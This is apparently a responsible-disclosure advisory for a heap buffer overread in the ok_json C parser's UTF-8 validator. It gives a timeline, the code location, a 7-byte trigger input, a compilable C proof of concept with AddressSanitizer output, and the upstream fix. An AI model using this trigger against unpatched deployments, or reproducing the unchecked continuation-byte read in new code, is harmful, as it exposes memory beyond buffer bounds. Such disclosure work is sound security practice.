ok_json: heap buffer overread in UTF-8 validation
A heap buffer overread in ok_json's UTF-8 validator. A multi-byte UTF-8 lead byte at the end of input causes the validator to read continuation bytes past the end of the caller-supplied buffer. Fixed upstream on 2026-04-14.
// Timeline
- 2026-04-08 Reported to vendor
- 2026-04-13 Vendor acknowledged
- 2026-04-14 Fixed upstream; issue closed
- 2026-04-22 CVE requested (pending)
Summary
ok_json is a C99 JSON parser targeting embedded and safety-critical contexts. In versions prior to the fix on 2026-04-14, the UTF-8 continuation-byte validator reads successor bytes unconditionally, based only on the lead byte, without verifying those offsets are within the caller-supplied buffer.
Technical details
Location: src/ok_json.c:178-321 (okj_validate_utf8_sequence), called from okj_parse_value at line 1161.
The validator reads continuation bytes (src[pos+1], src[pos+2], src[pos+3]) based on the lead byte’s multi-byte class. The caller only guarantees that one byte is readable (parser->position < parser->json_len), not the 2–4 bytes the validator may consume.
Trigger
A multi-byte UTF-8 lead byte as the last byte of input inside a string — 7 bytes, no NUL terminator, no padding past the allocation:
{"a":"<0xC2>
Byte 0xC2 is a valid 2-byte UTF-8 lead; the validator reads src[pos+1] one byte past the allocation.
Proof of concept
/* Compile: clang -g -O0 -fsanitize=address -Iinclude poc.c -o poc
* Run: ./poc
*
* 0xC2 is a 2-byte UTF-8 lead. okj_validate_utf8_sequence reads
* src[pos+1] unconditionally, but pos is the last byte of the
* buffer (index 6, json_len 7) — src[7] is past the allocation.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include "../src/ok_json.c"
int main(void)
{
const char prefix[] = "{\"a\":\"";
size_t prefix_len = sizeof(prefix) - 1U; /* 6 */
size_t len = prefix_len + 1U; /* 7 */
char *buf = (char *)malloc(len);
if (buf == NULL) { return 1; }
memcpy(buf, prefix, prefix_len);
buf[prefix_len] = (char)0xC2; /* 2-byte UTF-8 lead byte */
OkJsonParser parser;
okj_init(&parser, buf, (uint16_t)len);
OkjError rc = okj_parse(&parser);
printf("okj_parse returned: %d\n", (int)rc);
free(buf);
return 0;
}
AddressSanitizer output:
heap-buffer-overflow at ok_json.c:199 in okj_validate_utf8_sequence
READ of size 1 at 0 bytes to the right of 7-byte region
Impact
Out-of-bounds read of up to three bytes past a caller-supplied buffer (for 4-byte UTF-8 lead bytes). The validator’s ACSL contracts correctly document a precondition that the required bytes are readable, but the caller does not satisfy that precondition.
Fix
Upstream patched on 2026-04-14: the validator now checks remaining bytes (json_len - position) before reading continuation bytes, returning invalid if fewer bytes remain than the lead byte requires. See issue #69 for the full disclosure and vendor response.